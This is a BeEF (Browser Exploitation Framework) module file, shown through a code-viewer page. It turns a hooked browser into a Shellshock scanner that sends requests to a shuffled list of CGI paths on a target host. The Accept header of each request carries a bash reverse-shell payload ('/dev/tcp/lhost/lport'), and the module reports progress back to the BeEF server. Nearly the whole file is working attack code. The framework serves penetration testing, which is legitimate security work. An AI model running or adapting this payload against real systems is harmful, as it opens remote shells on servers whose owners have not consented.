Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/exploits/shell_shock_scanner/command.js
1154 views
1
//

2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7
beef.execute(function() {

8
  var rproto = '<%= @rproto %>';

9
  var rhost = '<%= @rhost %>'; 

10
  var rport = '<%= @rport %>';

11
  var lhost = '<%= @lhost %>';

12
  var lport = '<%= @lport %>';

13
  var target = rproto + '://' + rhost + ':' + rport; 

14
  var method = '<%= @method %>';

15
  var wait = '<%= @wait %>';

16


17
  get_cgi = function(uri) {

18
    try {

19
      var payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1 &";

20
      var xhr = new XMLHttpRequest();

21
      xhr.open(method, target+uri, true);

22
      xhr.onload = function () {

23
      };

24
      xhr.onreadystatechange = function () {

25
        if (xhr.readyState == 4 && xhr.status == 200) {

26
            beef.debug("[command #<%= @command_id %>] Response: " + xhr.response);

27
        }

28
      }

29
      xhr.setRequestHeader("Accept", payload);

30
      xhr.send(null);

31
    } catch (e){

32
      beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message);

33
    }

34
  }

35


36
  // add scripts to queue

37
  var requests = new Array(

38
<%=

39
  scripts = []

40
  File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|

41
    file_handle.each_line do |line|

42
      uri = line.chomp!

43
      next if uri =~ /^#/

44
      next if uri.nil?

45
      scripts << "'#{uri}'"

46
    end

47
  end

48
  scripts.shuffle.join(",\n")

49
%>

50
);

51


52
  // process queue

53
  beef.debug("[command #<%= @command_id %>] Starting Shellshock scan of "+target+" ("+requests.length+" URLs)");

54
  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan of "+target+" ("+requests.length+" URLs)");

55
  var timeout = wait * requests.length + 10;

56
  var handle = setInterval(function() {

57
    if (requests.length > 0) {

58
      get_cgi(requests.pop());

59
    } else cleanup();

60
  }, wait*1000);

61


62
  // clean up

63
  cleanup = function() {

64
    if (handle) {

65
      beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");

66
      clearInterval(handle);

67
      handle = 0;

68
      beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");

69
    }

70
  }

71
  setTimeout("cleanup();", timeout*1000);

72


73
});

74


75